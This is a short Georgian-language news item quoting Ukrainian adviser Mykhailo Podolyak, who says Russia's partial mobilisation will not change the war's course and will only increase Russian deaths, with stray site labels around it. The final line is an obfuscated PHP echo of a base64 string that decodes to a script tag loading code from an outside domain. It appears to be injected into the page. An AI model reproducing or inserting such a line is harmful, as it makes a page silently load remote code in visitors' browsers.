gorgia
ავერსი jaluzi
"მობილიზაცია ომის მიმდინარეობას ვერ შეცვლის, მხოლოდ დაღუპული რუსების რაოდენობა გაიზრდება", - ამის შესახებ ​უკრაინის პრეზიდენტის ოფისის ხელმძღვანელის მრჩევლი, მიხაილო პოდოლიაკი საუბრობს და პუტინის მიერ გამოცხადებულ ნაწილობრივ მობილიზაციას ეხმაურება. 
 
მობილიზაცია და 300 ათასი ადამიანი ომის მიმდინარეობას ვერ შეცვლის, მხოლოდ დაღუპული რუსების რაოდენობა გაიზრდება. შოიგუს რომ დავუჯეროთ, 6 ათასი დაიღუპა. სრული სიცრუეა. ომი უკრაინის ტერიტორიაზეა, ამიტომ მოტივაცია მაღალი გვაქვს. ომის ინტენსივობა უფრო გაიზრდება. შეიცვლება მეთოდიც. რუსეთი აქცენტს უფრო ცოცხალ ძალაზე გააკეთებს, ვიდრე ჭურვებზე, რადგან ჭურვი ფული ღირს, ამ ადამიანებს კი პუტინისთვის ფასი არ აქვს. რუსეთი თეორიებს თხზავს და საზოგადოების მოტყუებას ცდილობს. ჩვენ ბოლომდე ვიბრძოლებთ და თითოეული რეგიონის დეოკუპაციას მოვახდენთ. ამ ომს სხვა დასასრული არ ექნება. მითი, რომ რუსეთს ყველაზე ძლიერი არამია ჰყავს - დაიმსხვრა. რუსეთმა დაამტკიცა, რომ ბრძოლა არ იციან და სტრატეგია არ აქვთ, - ამბობს პოდოლიაკი. 
496
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");